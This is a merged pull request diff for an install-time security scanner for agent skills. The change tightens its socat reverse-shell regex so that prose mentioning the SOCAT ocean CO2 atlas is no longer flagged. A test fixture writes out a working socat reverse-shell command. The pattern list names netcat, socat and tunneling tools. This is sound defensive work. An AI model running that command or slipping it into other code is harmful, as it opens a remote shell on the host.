Merge pull request #111557 from NousResearch/fix/threat-patterns-socat-prose

Install scanner: SOCAT in prose is no longer a critical reverse-shell finding
This commit is contained in:
Teknium
2026-09-14 22:04:18 -07:00
committed by GitHub
2 changed files with 17 additions and 2 deletions

View File

@@ -169,6 +169,18 @@ class TestScanFile:
assert findings == []
def test_socat_prose_is_not_a_reverse_shell_but_a_socat_relay_is(self, tmp_path):
prose = tmp_path / "ocean.md"
prose.write_text(
"Load the SOCAT v2023 surface ocean CO2 atlas and merge with the socat cruise index.\n",
encoding="utf-8",
)
assert not any(fi.pattern_id == "reverse_shell" for fi in scan_file(prose, "ocean.md"))
shell = tmp_path / "shell.sh"
shell.write_text("socat TCP:10.0.0.5:4444 EXEC:/bin/bash,pty,stderr\n", encoding="utf-8")
assert any(fi.pattern_id == "reverse_shell" for fi in scan_file(shell, "shell.sh"))
def test_detect_gitlab_pat(self, tmp_path):
f = tmp_path / "leak.md"
# Concatenated so no contiguous token literal exists in this file

View File

@@ -18,7 +18,7 @@ from pathlib import Path
from typing import List, Tuple
SCANNER_VERSION = "skills-guard-v4"
SCANNER_VERSION = "skills-guard-v5"
# NVIDIA-verified skills each ship a signed `skill.oms.sig` + governance `skill-card.md`.
TRUSTED_REPOS = {"openai/skills", "anthropics/skills", "huggingface/skills", "NVIDIA/skills"}
@@ -229,7 +229,10 @@ THREAT_PATTERNS = [
(r'/etc/sudoers|visudo', "sudoers_mod", "critical", "persistence", "modifies sudoers (privilege escalation)"),
(r'git\s+config\s+--global\s+', "git_config_global", "medium", "persistence", "modifies global git configuration"),
# ── Network: reverse shells and tunnels ──
(r'\bnc\s+-[lp]|ncat\s+-[lp]|\bsocat\b', "reverse_shell", "critical", "network", "potential reverse shell listener"),
# socat needs an address spec (TCP:/EXEC:/…): a bare word match hit "SOCAT", the
# oceanographic CO2 atlas, across dozens of science skills (all patterns are IGNORECASE).
(r'\bnc\s+-[lp]|ncat\s+-[lp]|\bsocat\b[^\n]*\b(?:tcp|udp|openssl|ssl|exec|system|pty|unix)[\w-]*:',
"reverse_shell", "critical", "network", "potential reverse shell listener"),
(r'\bngrok\b|\blocaltunnel\b|\bserveo\b|\bcloudflared\b',
"tunnel_service", "high", "network", "uses tunneling service for external access"),
(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{2,5}', "hardcoded_ip_port", "medium", "network", "hardcoded IP address with port"),